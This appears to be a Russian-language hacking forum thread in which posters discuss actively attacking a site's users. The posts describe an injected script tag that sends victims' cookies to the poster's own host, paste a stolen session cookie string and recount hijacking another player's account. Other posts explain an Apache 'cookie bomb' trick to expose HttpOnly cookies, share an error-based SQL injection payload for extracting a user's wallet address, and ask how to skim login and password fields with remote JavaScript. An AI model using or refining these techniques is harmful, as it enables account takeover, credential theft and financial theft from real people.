Там на форуме на моих куках есть еще 2 строчки которые сниффер не ловит. ------------------------------------------------------------------------------------------------------ w2vL_cca8_auth and w2vL_cca8_saltkey ------------------------------------------------------------------------------------------------------ Почему эти стрчки не идут,хотя скрипт то стоит на /forum/forum.php а не на www.site.ru? И что можно сделать что бы они шли?
я так же подумал в начале, но ник1201 пишет о снифере, а если он подразумевает под снифером все-таки снифер, а не скрипт с document.cookie, то там будут видны все куки... хотя, фраза ко мне приходят... я запутался
На сайте www.site.ru/forum/forum.php у меня вшит скрипт <script src=http:/мойхост.ru/1.js></script> и с сайта www.site.ru/forum/forum.php мне отправляются чужие куки на мой снифер,и в log.txt у меня хранятся чужие куки вида -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- w2vL_cca8_lastvisit=1437004847; w2vL_cca8_nofavfid=1; PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3; w2vL_cca8_ulastactivity=e5cfycfnuKcJ%2BGIxyWlITZuc7NidwNkrv05%2F53l2Qado4EaUbTuI; w2vL_cca8_lastcheckfeed=21728%7C1437560824; w2vL_cca8_visitedfid=45D46D53D2; w2vL_cca8_viewid=tid_6189; w2vL_cca8_forum_lastvisit=D_2_1437336598D_53_1437524926D_46_1437525191D_45_1437561663; ==>Это чужие Cookie w2vL_cca8_smile=1D1; __zlcmid=Vienkp6pQjrijA; _ga=GA1.2.956537111.1436906922F; w2vL_cca8_lastact=1437566946%09forum.php%09; w2vL_cca8_onlineusernum=59; w2vL_cca8_sid=ro6N6g -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Мне достаточно в куках подменить 2 строчки для того что бы играть за чужого перса (для подмены куков использую расширение для оперы EditThisCookie) на www.site.ru -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 1)PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3 2)_ga=GA1.2.956537111.1436906922F -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- А на форуме (www.site.ru/forum/forum.php) у меня не получается подменить куки,даже если я меняю все строчки. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Для проверки я зашел на форум под своим логином и при помощи расширения EditThisCookie посмотрел как выглядят свои куки,и там были еще строчки котрые снифер не ловит -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- w2vL_cca8_auth w2vL_cca8_saltkey
Все я понял,для авторизации на форуме нужны 2 строчки вот эти w2vL_cca8_auth w2vL_cca8_saltkey но почему то снифер их не ловит,в чем может быть проблема?
Есть такая узявимость как HTTP Only Cookie Disclosure. Я её ещё называю Cookie Bomb. Работает так: 1) Необходимо установить специальную cookie, название которой располагается ниже cookie, которую необходимо скомпрометировать, при условии упорядочивания их в алфавитном порядке. 2) Специальная cookie должна состоять из более чем 10000 символов для вызова уязвимости в версии Apache < 2.2.21 (Круче скрина не нашёл в отчётах, соррь. Ну понять можно). Соответвественно, работает до версии Apache 2.2.22
делаю такой запрос (SELECT 1 and ROW(1,1)>(select count(*),concat((SELECT wallet_address FROM users WHERE user_id = 1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' но в ответ получаю Subquery returns more than 1 row как вытащить wallet_address (34 символа)? спасибо
Есть сайт такого типа Форма логина такая - <input type="text" name="username" id="ls_username" class="px vm xg1" value="Email" onfocus="if(this.value == 'Email'){this.value = '';this.className = 'px vm';}" onblur="if(this.value == ''){this.value = 'Email';this.className = 'px vm xg1';}" tabindex="901"> ---------------------------------------------------------------------------------------------------------------- Форма пароля такая -<input type="password" name="password" id="ls_password" class="px vm" autocomplete="off" tabindex="902"> ---------------------------------------------------------------------------------------------------------------- Можно ли удаленным js воровать логи и пароли из этих форм ?кража кук не подходит т.к httponly не обходится.((Или что еще можно придумать?Заранее спс Картинка была нарисована в paint ,просто порисовать захотелось)))
